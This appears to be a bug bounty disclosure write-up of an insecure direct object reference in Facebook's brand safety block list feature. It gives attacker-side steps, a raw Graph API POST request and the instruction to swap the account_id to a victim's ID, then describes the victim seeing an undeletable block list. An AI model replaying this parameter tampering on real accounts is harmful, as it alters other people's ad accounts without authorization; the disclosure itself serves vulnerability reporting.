from attacker account:
========================

1- Go to https://www.facebook.com/brand_safety/
2- Select block list ===> Create block list====> type block list name and upload any .txt file ====> then hit upload =====> apply ====> select any of those options ("Don't apply to ad account now" or "Apply to ad account") it doesn't matter ===> Save
3- Go to Control options ====> Select block list ===> check on the block list name that you created ===> Intercept with burpsuite ===> Save

you should see POST request like below:

POST /v7.0/AD_ACCOUNT_ID/auto_applied_ad_accounts?access_token=xxxxxxx HTTP/1.1
Host: graph.facebook.com


_reqName=object%3AblocklistID%2Fauto_applied_ad_accounts&_reqSrc=AdsBLApplyActions&account_id=AD_ACCOUNT_ID&is_auto_blocking_on=true&locale=en_US&method=post&pretty=0&suppress_http_code=1&xref=f1d13994d497178



change the value of "account_id=" to victim's value ID and forward the request to the server, you will get error response as below :


{"error":{"message":"Unsupported post request.","type":"GraphMethodException","code":100,"fbtrace_id":"AwRwBgKI-PylZaWcUybP0Kr"}}


but it is ok, despite the server gave us an error but it worked




From the victim account:
==========================

1- Go to https://www.facebook.com/brand_safety/
2- Then go to Block lists options and you will see that the attacker created a block list name on behalf of victim user and the victim is not able to delete the block list only when the attacker delete it.